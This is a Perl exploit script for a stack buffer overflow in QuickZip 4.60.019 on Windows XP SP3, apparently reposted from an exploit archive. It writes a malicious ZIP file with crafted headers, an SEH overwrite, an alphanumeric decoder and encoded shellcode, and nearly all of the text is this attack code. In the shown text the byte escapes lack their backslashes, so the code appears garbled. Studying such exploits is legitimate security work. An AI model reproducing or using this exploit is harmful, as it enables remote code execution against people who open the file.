QuickZip 4.60.019 Stack BOF - XP SP3
Posted on 15 March 2010
==================================== QuickZip 4.60.019 Stack BOF - XP SP3 ==================================== # Exploit Title : QuickZip 4.60.019 Stack BOF - XP SP3 # OSVDB-ID : 62781 # Date : March 2nd 2010 # Author : corelanc0d3r # Bug found by : corelanc0d3r # Software Link : http://www.quickzip.org/downloads.html # Version : 4.60.019 # OS : Windows # Tested on : XP SP3 En (VirtualBox) - offset is 297. # You may have to change this to 294 # Type of vuln : SEH, with ppr from OS dll # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # ---------------------------------------------------------------------------------------------------- # Detailed write-up about this vulnerability and exploit # can be found at # http://www.offensive-security.com/blog/vulndev/quickzip-stack-bof-a-box-of-chocolates-part-2/ # ---------------------------------------------------------------------------------------------------- # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # # # Code : print "|------------------------------------------------------------------| "; print "| __ __ | "; print "| _________ ________ / /___ _____ / /____ ____ _____ ___ | "; print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | "; print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | "; print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | "; print "| | "; print "| http://www.corelan.be:8800 | "; print "| | "; print "|-------------------------------------------------[ EIP Hunters ]--| "; print " --==[ Exploit for QuickZip 4.60.019 ]==-- "; my $sploitfile="corelansploit.zip"; my $ldf_header = "x50x4Bx03x04x14x00x00". "x00x00x00xB7xACxCEx34x00x00x00" . "x00x00x00x00x00x00x00x00" . "xe4x0f" . "x00x00x00"; my $cdf_header = "x50x4Bx01x02x14x00x14". "x00x00x00x00x00xB7xACxCEx34x00x00x00" . "x00x00x00x00x00x00x00x00x00". "xe4x0f". "x00x00x00x00x00x00x01x00". "x24x00x00x00x00x00x00x00"; my $eofcdf_header = "x50x4Bx05x06x00x00x00". "x00x01x00x01x00". "x12x10x00x00". "x02x10x00x00". "x00x00"; print "[+] Preparing payload "; my $nseh="x41x41x41x41"; my $seh="x65x47x7ex6d"; my $payload = "B" x 297 . $nseh . $seh; my $predecoder = "x59x59x59x51x5c"; my $decoder="x25x4Ax4Dx4Ex55". "x25x35x32x31x2A". "x2Dx55x55x55x5F". "x2Dx55x55x55x5F". "x2Dx56x55x56x5F". "x50". "x25x4Ax4Dx4Ex55". "x25x35x32x31x2A". "x2Dx2Ax6Ax31x55". "x2Dx2Ax6Ax31x55". "x2Dx2Bx5Ax30x55". "x50". "x73xf7"; $payload=$payload.$predecoder.$decoder; my $filltoecx="B" x (100-length($predecoder.$decoder)); my $shellcode = "IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BB". "ABXP8ABuJIhYXkOkXYt4vDjT4qYBNRQjfQO93TLKRQ00nkSFDLLKT6uLN". "kqV4HLKQnwPLKWF5hPOVxqeicryuQkayoKQU0lKplwTUtlKaUGLlKf4tE". "CHvaHjNkpJDXLKCjUp6aJKhcgGG9LKp4nk5QxnvQkOP1iPIlNLmTO0RTU". "ZjaZo4MUQO7M9Xqio9oKOGKcLQ4WXrUKnnkpZdds18kQvnkTLRknkpZUL". "WqJKlKtDlKUQJHk91Tq4wl3QXCmbs819xTk9HemYkr58LNRntNjLRrKXO". "lyoio9oNiBe34mkqnjxYr43LGwl7TBrJHLKyokOiomYCuUXQxrL0lupKO". "QxVSebTnPdbH0uRSsU1bLHQLq4tJNim6RvIoRuWtNio2BpMkI8NBRmmlK". "7uL7T1BKXQNKOyoYocXPstzQHq0cXWPQcsQRY1xFPRDp3rRcX0lQq0ncS". "phrCrOCBpefQkknhqL4dwbNiIsSXrEu4PXUpqxepvP47rNQxPb2ErE2NU". "8SQT6e5WPQxbOpu5psXQxE1CXgPPy0h1qrHCQcXPhrMpuSQphVQO9nh0L". "6DuNK9HatqKbPR3cV1RrYoxPDqkprpKObuvhA"; my $rest = "C" x (4064-length($payload.$filltoecx.$shellcode)) . ".txt"; $payload = $payload.$filltoecx.$shellcode.$rest; my $evilzip = $ldf_header.$payload.$cdf_header.$payload.$eofcdf_header; print "[+] Writing payload to file "; open(FILE,">$sploitfile"); print FILE $evilzip; close(FILE); print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile "; # ~ - [ [ : Inj3ct0r : ] ]
